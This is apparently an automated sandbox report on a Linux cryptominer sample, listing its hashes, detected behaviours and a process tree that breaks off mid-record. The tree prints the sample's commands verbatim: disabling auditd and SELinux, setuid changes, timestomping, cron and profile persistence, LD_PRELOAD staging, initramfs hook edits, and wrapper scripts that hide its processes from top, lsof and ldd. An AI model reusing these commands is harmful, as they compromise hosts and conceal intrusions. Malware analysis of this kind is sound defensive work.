Resubmissions

08-10-2024 14:36

241008-ryjx3a1emk 5

08-10-2024 14:14

241008-rj4c6atgqb 10

Analysis

  • max time kernel
    27s
  • max time network
    149s
  • platform
    ubuntu-24.04_amd64
  • resource
    ubuntu2404-amd64-20240523-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu2404-amd64-20240523-en, kernel:6.8.0-31-generic, locale:en-us, os:ubuntu-24.04-amd64, system
  • submitted
    08-10-2024 14:14

General

  • Target

    22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13

  • Size

    8.9MB

  • MD5

    656e22c65bf7c04d87b5afbe52b8d800

  • SHA1

    0fd199053171fec86be186106eac717c4edae2ad

  • SHA256

    22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13

  • SHA512

    697954f75e391a6cc600b7d40509ac1a1515cb0a4234cc3ae4270beaf7bbc3a3da23a9cd4f25e0eb4f5956d24ca3866e2574dc9493644845aac1063e1e4b0183

  • SSDEEP

    196608:WVm8yS4rLDSkQLfkwE7tdQagxldCn588VM2ywSb2VEGCN4:WVm0GSkQLkN773+2MHzaV1C2

Malware Config

Signatures

  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • Modifies the dynamic linker configuration file 2 TTPs 1 IoCs

    Malware can modify the configuration file of the dynamic linker to preload malicious libraries with every executed process.

  • XMRig Miner payload 1 IoCs
  • File and Directory Permissions Modification 1 TTPs 17 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Indicator Removal: Clear Command History 1 TTPs 1 IoCs

    Adversaries may remove indicators of compromise from the host to evade detection.

  • Deletes itself 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Checks hardware identifiers (DMI) 1 TTPs 6 IoCs

    Checks DMI information, which indicates whether the system is a virtual machine.

  • Creates/modifies Cron job 1 TTPs 4 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Creates/modifies environment variables 1 TTPs 1 IoCs

    Creating/modifying environment variables is a common persistence mechanism.

  • Disables SELinux 1 TTPs 3 IoCs

    Disables SELinux security module.

  • Enumerates active TCP sockets 1 TTPs 1 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies special file permissions 1 TTPs 6 IoCs

    Adds special setuid and/or setgid bits on a file, possibly to elevate privileges.

  • Modifies systemd 2 TTPs 1 IoCs

    Adds/modifies systemd service files, likely to achieve persistence.

  • Reads hardware information 1 TTPs 19 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Reads list of loaded kernel modules 1 TTPs 3 IoCs

    Reads the list of currently loaded kernel modules, possibly to detect virtual environments.

  • Writes file to system bin folder 6 IoCs
  • Indicator Removal: Timestomp 1 TTPs 11 IoCs

    Adversaries may remove indicators of compromise from the host to evade detection.

  • Modifies Bash startup script 2 TTPs 1 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Changes its process name 2 IoCs
  • Checks CPU configuration 1 TTPs 4 IoCs

    Checks CPU information, which indicates whether the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 7 IoCs
  • Reads system network configuration 1 TTPs 1 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Command and Scripting Interpreter: Unix Shell 1 TTPs 44 IoCs

    Execute scripts via Unix Shell.

  • Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to shm directory 31 IoCs

    Malware can drop malicious files in the shm directory which will run directly from RAM.

  • Writes file to tmp directory 31 IoCs

    Malware often drops required files in the /tmp directory.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

Processes

  • /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
    /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
    1⤵
    • Reads list of loaded kernel modules
    • Checks CPU configuration
    • Writes file to tmp directory
    PID:2478
    • /usr/bin/getconf
      getconf CLK_TCK
      2⤵
        PID:2483
      • /usr/bin/getconf
        getconf PAGESIZE
        2⤵
          PID:2484
        • /bin/sh
          /bin/sh -c "PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin;nohup /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13 >/dev/null 2>/dev/null & exit"
          2⤵
          • Command and Scripting Interpreter: Unix Shell
          PID:2485
          • /usr/bin/nohup
            nohup /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
            3⤵
              PID:2486
        • /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
          /tmp/22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13
          1⤵
          • Deletes itself
          • Reads list of loaded kernel modules
          • Checks CPU configuration
          • Reads runtime system information
          • Writes file to tmp directory
          PID:2486
          • /usr/bin/getconf
            getconf CLK_TCK
            2⤵
              PID:2494
            • /usr/bin/getconf
              getconf PAGESIZE
              2⤵
                PID:2495
              • /bin/sh
                /bin/sh -c "cp /proc/2486/exe /tmp/.perf.c/gvfs-mtp-volume-monitor && chmod +x /tmp/.perf.c/gvfs-mtp-volume-monitor"
                2⤵
                • File and Directory Permissions Modification
                PID:2496
                • /usr/bin/cp
                  cp /proc/2486/exe /tmp/.perf.c/gvfs-mtp-volume-monitor
                  3⤵
                  • Writes file to tmp directory
                  PID:2497
                • /usr/bin/chmod
                  chmod +x /tmp/.perf.c/gvfs-mtp-volume-monitor
                  3⤵
                  • File and Directory Permissions Modification
                  PID:2498
              • /bin/sh
                /bin/sh -c "PATH=/tmp/.perf.c:/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/snap/bin;gvfs-mtp-volume-monitor -k &"
                2⤵
                • Command and Scripting Interpreter: Unix Shell
                PID:2499
            • /tmp/.perf.c/gvfs-mtp-volume-monitor
              gvfs-mtp-volume-monitor -k
              1⤵
              • Modifies the dynamic linker configuration file
              • Executes dropped EXE
              • Checks hardware identifiers (DMI)
              • Creates/modifies Cron job
              • Creates/modifies environment variables
              • Enumerates active TCP sockets
              • Modifies systemd
              • Reads hardware information
              • Reads list of loaded kernel modules
              • Writes file to system bin folder
              • Modifies Bash startup script
              • Checks CPU configuration
              • Reads system network configuration
              • Enumerates kernel/hardware configuration
              • Reads runtime system information
              • Writes file to shm directory
              • Writes file to tmp directory
              PID:2500
              • /usr/bin/getconf
                getconf CLK_TCK
                2⤵
                  PID:2505
                • /usr/bin/getconf
                  getconf PAGESIZE
                  2⤵
                    PID:2506
                  • /bin/sh
                    /bin/sh -c "auditctl -e0"
                    2⤵
                    • Command and Scripting Interpreter: Unix Shell
                    PID:2507
                    • /usr/sbin/auditctl
                      auditctl -e0
                      3⤵
                        PID:2509
                    • /bin/sh
                      /bin/sh -c "echo 0 > /sys/fs/selinux/enforce"
                      2⤵
                      • Command and Scripting Interpreter: Unix Shell
                      PID:2511
                    • /bin/sh
                      /bin/sh -c "setenforce 0"
                      2⤵
                      • Command and Scripting Interpreter: Unix Shell
                      PID:2513
                      • /usr/sbin/setenforce
                        setenforce 0
                        3⤵
                        • Disables SELinux
                        PID:2514
                    • /bin/sh
                      /bin/sh -c "if grep -q '^SELINUX=' /etc/selinux/config;then sed -i 's/^SELINUX=.*/SELINUX=disabled/' /etc/selinux/config;fi"
                      2⤵
                      • Command and Scripting Interpreter: Unix Shell
                      PID:2515
                      • /usr/bin/grep
                        grep -q "^SELINUX=" /etc/selinux/config
                        3⤵
                          PID:2516
                        • /usr/bin/sed
                          sed -i "s/^SELINUX=.*/SELINUX=disabled/" /etc/selinux/config
                          3⤵
                            PID:2517
                        • /bin/sh
                          /bin/sh -c "if systemctl status auditd|grep -q 'enabled;';then systemctl stop auditd;systemctl disable auditd;fi"
                          2⤵
                          • Command and Scripting Interpreter: Unix Shell
                          PID:2529
                          • /usr/bin/systemctl
                            systemctl status auditd
                            3⤵
                              PID:2530
                            • /usr/bin/grep
                              grep -q "enabled;"
                              3⤵
                                PID:2531
                              • /usr/bin/systemctl
                                systemctl stop auditd
                                3⤵
                                • Indicator Removal: Clear Command History
                                PID:2539
                              • /usr/bin/systemctl
                                systemctl disable auditd
                                3⤵
                                • Changes its process name
                                PID:2547
                                • /usr/bin/getopt
                                  getopt -o r: --long root: -- disable auditd
                                  4⤵
                                    PID:2549
                                  • /usr/sbin/update-rc.d
                                    /usr/sbin/update-rc.d auditd defaults
                                    4⤵
                                      PID:2550
                                      • /tmp/.perf.c/systemctl
                                        systemctl daemon-reload
                                        5⤵
                                          PID:2553
                                        • /tmp/systemctl
                                          systemctl daemon-reload
                                          5⤵
                                            PID:2553
                                          • /usr/local/sbin/systemctl
                                            systemctl daemon-reload
                                            5⤵
                                              PID:2553
                                            • /usr/local/bin/systemctl
                                              systemctl daemon-reload
                                              5⤵
                                                PID:2553
                                              • /usr/sbin/systemctl
                                                systemctl daemon-reload
                                                5⤵
                                                  PID:2553
                                                • /usr/bin/systemctl
                                                  systemctl daemon-reload
                                                  5⤵
                                                    PID:2553
                                                • /usr/sbin/update-rc.d
                                                  /usr/sbin/update-rc.d auditd disable
                                                  4⤵
                                                    PID:2726
                                                    • /tmp/.perf.c/systemctl
                                                      systemctl daemon-reload
                                                      5⤵
                                                        PID:2730
                                                      • /tmp/systemctl
                                                        systemctl daemon-reload
                                                        5⤵
                                                          PID:2730
                                                        • /usr/local/sbin/systemctl
                                                          systemctl daemon-reload
                                                          5⤵
                                                            PID:2730
                                                          • /usr/local/bin/systemctl
                                                            systemctl daemon-reload
                                                            5⤵
                                                              PID:2730
                                                            • /usr/sbin/systemctl
                                                              systemctl daemon-reload
                                                              5⤵
                                                                PID:2730
                                                              • /usr/bin/systemctl
                                                                systemctl daemon-reload
                                                                5⤵
                                                                  PID:2730
                                                          • /bin/sh
                                                            /bin/sh -c "chmod 4755 /bin/wizlmsh"
                                                            2⤵
                                                            • File and Directory Permissions Modification
                                                            PID:2535
                                                            • /usr/bin/chmod
                                                              chmod 4755 /bin/wizlmsh
                                                              3⤵
                                                              • File and Directory Permissions Modification
                                                              PID:2536
                                                          • /bin/sh
                                                            /bin/sh -c "touch -acmr /bin/sh /bin/wizlmsh"
                                                            2⤵
                                                            • Indicator Removal: Timestomp
                                                            PID:2537
                                                            • /usr/bin/touch
                                                              touch -acmr /bin/sh /bin/wizlmsh
                                                              3⤵
                                                              • Indicator Removal: Timestomp
                                                              PID:2538
                                                          • /bin/sh
                                                            /bin/sh -c "touch -acmr /bin/sh /bin/perfcc"
                                                            2⤵
                                                            • Indicator Removal: Timestomp
                                                            PID:2551
                                                            • /usr/bin/touch
                                                              touch -acmr /bin/sh /bin/perfcc
                                                              3⤵
                                                              • Indicator Removal: Timestomp
                                                              PID:2552
                                                          • /bin/sh
                                                            /bin/sh -c "touch -acmr /bin/sh /bin/perfcc"
                                                            2⤵
                                                            • Indicator Removal: Timestomp
                                                            PID:2573
                                                            • /usr/bin/touch
                                                              touch -acmr /bin/sh /bin/perfcc
                                                              3⤵
                                                              • Indicator Removal: Timestomp
                                                              PID:2576
                                                          • /bin/sh
                                                            /bin/sh -c "touch -acmr /bin/sh /bin/perfcc"
                                                            2⤵
                                                            • Indicator Removal: Timestomp
                                                            PID:2619
                                                            • /usr/bin/touch
                                                              touch -acmr /bin/sh /bin/perfcc
                                                              3⤵
                                                              • Indicator Removal: Timestomp
                                                              PID:2625
                                                          • /bin/sh
                                                            /bin/sh -c "(crontab -l|grep -v -e perfcc -e /tmp/.perf;echo '11 * * * * /root/.config/cron/perfcc')|crontab -"
                                                            2⤵
                                                            • Command and Scripting Interpreter: Unix Shell
                                                            PID:2670
                                                            • /usr/bin/crontab
                                                              crontab -
                                                              3⤵
                                                              • Creates/modifies Cron job
                                                              PID:2672
                                                            • /usr/bin/crontab
                                                              crontab -l
                                                              3⤵
                                                                PID:2673
                                                              • /usr/bin/grep
                                                                grep -v -e perfcc -e /tmp/.perf
                                                                3⤵
                                                                  PID:2674
                                                              • /bin/sh
                                                                /bin/sh -c "sed -n -i '/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc' /root/.profile;touch -acmr /bin/sh /root/.profile"
                                                                2⤵
                                                                • Indicator Removal: Timestomp
                                                                PID:2684
                                                                • /usr/bin/sed
                                                                  sed -n -i "/perfcc/d;p;1a test -x /bin/perfcc && FPROF=p /bin/perfcc" /root/.profile
                                                                  3⤵
                                                                    PID:2685
                                                                  • /usr/bin/touch
                                                                    touch -acmr /bin/sh /root/.profile
                                                                    3⤵
                                                                    • Indicator Removal: Timestomp
                                                                    PID:2686
                                                                • /bin/sh
                                                                  /bin/sh -c "cp /proc/2500/exe /lib/libpprocps.so && chmod +x /lib/libpprocps.so"
                                                                  2⤵
                                                                  • File and Directory Permissions Modification
                                                                  PID:2688
                                                                  • /usr/bin/cp
                                                                    cp /proc/2500/exe /lib/libpprocps.so
                                                                    3⤵
                                                                      PID:2689
                                                                    • /usr/bin/chmod
                                                                      chmod +x /lib/libpprocps.so
                                                                      3⤵
                                                                      • File and Directory Permissions Modification
                                                                      PID:2690
                                                                  • /bin/sh
                                                                    /bin/sh -c "cp /proc/2500/exe /lib/libfsnldev.so && chmod +x /lib/libfsnldev.so"
                                                                    2⤵
                                                                    • File and Directory Permissions Modification
                                                                    PID:2691
                                                                    • /usr/bin/cp
                                                                      cp /proc/2500/exe /lib/libfsnldev.so
                                                                      3⤵
                                                                        PID:2692
                                                                      • /usr/bin/chmod
                                                                        chmod +x /lib/libfsnldev.so
                                                                        3⤵
                                                                        • File and Directory Permissions Modification
                                                                        PID:2693
                                                                    • /bin/.local/bin/top
                                                                      /bin/.local/bin/top
                                                                      2⤵
                                                                        PID:2694
                                                                      • /bin/bash
                                                                        /bin/.local/bin/top -c "exec '/bin/.local/bin/top' \"\$@\"" /bin/.local/bin/top
                                                                        2⤵
                                                                          PID:2694
                                                                        • /bin/.local/bin/top
                                                                          /bin/.local/bin/top
                                                                          2⤵
                                                                            PID:2694
                                                                          • /bin/bash
                                                                            /bin/.local/bin/top -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='top' m='perfctl' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else trap 'rm -rf /tmp/smpr &>/dev/null' EXIT trap 'rm -rf /tmp/smpr &>/dev/null' SIGINT touch /tmp/smpr &>/dev/null export AAZHDE=1 pkill -9 \$m &>/dev/null killall -9 \$m &>/dev/null ps -ax|grep \$m|grep -v grep|awk '{print \$1}'|xargs kill -9 &>/dev/null ps -ax|grep \$m|grep -vq grep || rm -rf /tmp/.apid &>/dev/null unset AAZHDE \$r \$@ fi " /bin/.local/bin/top
                                                                            2⤵
                                                                              PID:2694
                                                                              • /usr/bin/env
                                                                                env
                                                                                3⤵
                                                                                  PID:2695
                                                                                • /usr/bin/grep
                                                                                  grep -q ABWTRX
                                                                                  3⤵
                                                                                    PID:2696
                                                                                • /bin/.local/bin/crontab
                                                                                  /bin/.local/bin/crontab
                                                                                  2⤵
                                                                                    PID:2697
                                                                                  • /bin/bash
                                                                                    /bin/.local/bin/crontab -c "exec '/bin/.local/bin/crontab' \"\$@\"" /bin/.local/bin/crontab
                                                                                    2⤵
                                                                                      PID:2697
                                                                                    • /bin/.local/bin/crontab
                                                                                      /bin/.local/bin/crontab
                                                                                      2⤵
                                                                                        PID:2697
                                                                                      • /bin/bash
                                                                                        /bin/.local/bin/crontab -c " #!/bin/bash function rcrj(){ (\$r -l|grep -v -e perfcc -e /tmp/.perf;echo \"11 * * * * \$ap\")|\$r - } if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='crontab' a='perfcc' ap=\"\$HOME/.config/cron/perfcc\" p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else trap rcrj EXIT \$r -l|grep -Fv -e \$a -e /tmp/.perf|\$r - \$r \$@ fi " /bin/.local/bin/crontab
                                                                                        2⤵
                                                                                          PID:2697
                                                                                          • /usr/bin/grep
                                                                                            grep -q ABWTRX
                                                                                            3⤵
                                                                                              PID:2699
                                                                                            • /usr/bin/env
                                                                                              env
                                                                                              3⤵
                                                                                                PID:2698
                                                                                            • /bin/.local/bin/ldd
                                                                                              /bin/.local/bin/ldd
                                                                                              2⤵
                                                                                                PID:2700
                                                                                              • /bin/bash
                                                                                                /bin/.local/bin/ldd -c "exec '/bin/.local/bin/ldd' \"\$@\"" /bin/.local/bin/ldd
                                                                                                2⤵
                                                                                                  PID:2700
                                                                                                • /bin/.local/bin/ldd
                                                                                                  /bin/.local/bin/ldd
                                                                                                  2⤵
                                                                                                    PID:2700
                                                                                                  • /bin/bash
                                                                                                    /bin/.local/bin/ldd -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='ldd' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else \$r \$@ | grep -v gcwrap fi " /bin/.local/bin/ldd
                                                                                                    2⤵
                                                                                                      PID:2700
                                                                                                      • /usr/bin/env
                                                                                                        env
                                                                                                        3⤵
                                                                                                          PID:2701
                                                                                                        • /usr/bin/grep
                                                                                                          grep -q ABWTRX
                                                                                                          3⤵
                                                                                                            PID:2702
                                                                                                        • /bin/.local/bin/lsof
                                                                                                          /bin/.local/bin/lsof
                                                                                                          2⤵
                                                                                                            PID:2703
                                                                                                          • /bin/bash
                                                                                                            /bin/.local/bin/lsof -c "exec '/bin/.local/bin/lsof' \"\$@\"" /bin/.local/bin/lsof
                                                                                                            2⤵
                                                                                                              PID:2703
                                                                                                            • /bin/.local/bin/lsof
                                                                                                              /bin/.local/bin/lsof
                                                                                                              2⤵
                                                                                                                PID:2703
                                                                                                              • /bin/bash
                                                                                                                /bin/.local/bin/lsof -c " #!/bin/bash if env|grep -q ABWTRX;then echo ABWTRX00;exit 0;fi r='lsof' p=\$(echo \"\$PATH\"|sed 's;/.local/bin;/usr/bin;g' 2>/dev/null) if [ \$? -ne 0 ];then p=\"\${a/\\/.local\\/bin//usr/bin}\" fi export PATH=\$p if env|grep -q AAZHDE; then \$r \$@ else \$r \$@ | grep -Fv -e 'perfcc' -e 'perfctl' -e '.dmesg' -e '.xdiag' -e 'gcwrap' fi " /bin/.local/bin/lsof
                                                                                                                2⤵
                                                                                                                  PID:2703
                                                                                                                  • /usr/bin/env
                                                                                                                    env
                                                                                                                    3⤵
                                                                                                                      PID:2704
                                                                                                                    • /usr/bin/grep
                                                                                                                      grep -q ABWTRX
                                                                                                                      3⤵
                                                                                                                        PID:2705
                                                                                                                    • /bin/sh
                                                                                                                      /bin/sh -c "chmod 755 /bin/.local/bin/*;touch -acmr /etc/passwd /bin/.local/bin/*"
                                                                                                                      2⤵
                                                                                                                      • File and Directory Permissions Modification
                                                                                                                      PID:2706
                                                                                                                      • /usr/bin/chmod
                                                                                                                        chmod 755 /bin/.local/bin/crontab /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/top
                                                                                                                        3⤵
                                                                                                                        • File and Directory Permissions Modification
                                                                                                                        PID:2707
                                                                                                                      • /usr/bin/touch
                                                                                                                        touch -acmr /etc/passwd /bin/.local/bin/crontab /bin/.local/bin/ldd /bin/.local/bin/lsof /bin/.local/bin/top
                                                                                                                        3⤵
                                                                                                                        • Indicator Removal: Timestomp
                                                                                                                        PID:2708
                                                                                                                    • /bin/sh
                                                                                                                      /bin/sh -c "touch /tmp/lgcdm /tmp/d.xdiag-0;unset AAZHDE;LD_PRELOAD=/tmp/libgcwrap.so LGCEXTR=1 ls -la /tmp > /tmp/lgctr 2>&1;rm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so"
                                                                                                                      2⤵
                                                                                                                      • Command and Scripting Interpreter: Unix Shell
                                                                                                                      • Writes file to tmp directory
                                                                                                                      PID:2709
                                                                                                                      • /usr/bin/touch
                                                                                                                        touch /tmp/lgcdm /tmp/d.xdiag-0
                                                                                                                        3⤵
                                                                                                                        • Disables SELinux
                                                                                                                        • Writes file to tmp directory
                                                                                                                        PID:2710
                                                                                                                      • /usr/bin/ls
                                                                                                                        ls -la /tmp
                                                                                                                        3⤵
                                                                                                                          PID:2711
                                                                                                                        • /usr/bin/rm
                                                                                                                          rm -f /tmp/d.xdiag-0 /tmp/lgcdm /tmp/libgcwrap.so
                                                                                                                          3⤵
                                                                                                                            PID:2712
                                                                                                                        • /bin/sh
                                                                                                                          /bin/sh -c "LD_PRELOAD=/tmp/libgcwrap.so sh -c 'echo BAQLznamq9t08rtq7O5LDzm0K5nqROAs|cat > /tmp/lgctr2 2>&1'"
                                                                                                                          2⤵
                                                                                                                          • Command and Scripting Interpreter: Unix Shell
                                                                                                                          PID:2713
                                                                                                                          • /usr/bin/sh
                                                                                                                            sh -c "echo BAQLznamq9t08rtq7O5LDzm0K5nqROAs|cat > /tmp/lgctr2 2>&1"
                                                                                                                            3⤵
                                                                                                                            • Writes file to tmp directory
                                                                                                                            PID:2714
                                                                                                                            • /usr/bin/cat
                                                                                                                              cat
                                                                                                                              4⤵
                                                                                                                                PID:2716
                                                                                                                          • /bin/sh
                                                                                                                            /bin/sh -c "chmod g+s /lib/libgcwrap.so"
                                                                                                                            2⤵
                                                                                                                            • Command and Scripting Interpreter: Unix Shell
                                                                                                                            PID:2717
                                                                                                                            • /usr/bin/chmod
                                                                                                                              chmod g+s /lib/libgcwrap.so
                                                                                                                              3⤵
                                                                                                                              • Modifies special file permissions
                                                                                                                              PID:2718
                                                                                                                          • /bin/sh
                                                                                                                            /bin/sh -c "for f in \$(find /usr/share/initramfs-tools/hooks -type f 2>/dev/null|xargs grep -s -l 'ldd '|xargs grep -L 'export PATH=.*/\\.local/bin:.PATH');do sed -i '/^#!\\//a export PATH=/bin/.local/bin:\$PATH' \$f;done"
                                                                                                                            2⤵
                                                                                                                            • Command and Scripting Interpreter: Unix Shell
                                                                                                                            PID:2719
                                                                                                                            • /usr/bin/find
                                                                                                                              find /usr/share/initramfs-tools/hooks -type f
                                                                                                                              3⤵
                                                                                                                                PID:2721
                                                                                                                              • /usr/bin/xargs
                                                                                                                                xargs grep -s -l "ldd "
                                                                                                                                3⤵
                                                                                                                                  PID:2722
                                                                                                                                  • /tmp/.perf.c/grep
                                                                                                                                    grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                    4⤵
                                                                                                                                      PID:2724
                                                                                                                                    • /tmp/grep
                                                                                                                                      grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                      4⤵
                                                                                                                                        PID:2724
                                                                                                                                      • /usr/local/sbin/grep
                                                                                                                                        grep -s -l "ldd " /usr/share/initramfs-tools/hooks/mdadm /usr/share/initramfs-tools/hooks/thin-provisioning-tools /usr/share/initramfs-tools/hooks/brltty /usr/share/initramfs-tools/hooks/console_setup /usr/share/initramfs-tools/hooks/iscsi /usr/share/initramfs-tools/hooks/dhcpcd /usr/share/initramfs-tools/hooks/cryptkeyctl /usr/share/initramfs-tools/hooks/resume /usr/share/initramfs-tools/hooks/thermal /usr/share/initramfs-tools/hooks/btrfs /usr/share/initramfs-tools/hooks/bcache /usr/share/initramfs-tools/hooks/plymouth /usr/share/initramfs-tools/hooks/cryptgnupg /usr/share/initramfs-tools/hooks/cryptroot /usr/share/initramfs-tools/hooks/zz-busybox-initramfs /usr/share/initramfs-tools/hooks/fsck /usr/share/initramfs-tools/hooks/sg3-utils /usr/share/initramfs-tools/hooks/klibc-utils /usr/share/initramfs-tools/hooks/xfs /usr/share/initramfs-tools/hooks/framebuffer /usr/share/initramfs-tools/hooks/kmod /usr/share/initramfs-tools/hooks/udev /usr/share/initramfs-tools/hooks/fixrtc /usr/share/initramfs-tools/hooks/intel_microcode /usr/share/initramfs-tools/hooks/cryptroot-unlock /usr/share/initramfs-tools/hooks/cryptgnupg-sc /usr/share/initramfs-tools/hooks/amd64_microcode /usr/share/initramfs-tools/hooks/fuse /usr/share/initramfs-tools/hooks/kbd /usr/share/initramfs-tools/hooks/ntfs_3g /usr/share/initramfs-tools/hooks/lvm2 /usr/share/initramfs-tools/hooks/dmsetup /usr/share/initramfs-tools/hooks/cryptopensc /usr/share/initramfs-tools/hooks/cryptpassdev
                                                                                                                                        4⤵
                                                                                                                                          PID:2724
                                                                                                                                        • /usr/local/bin/grep
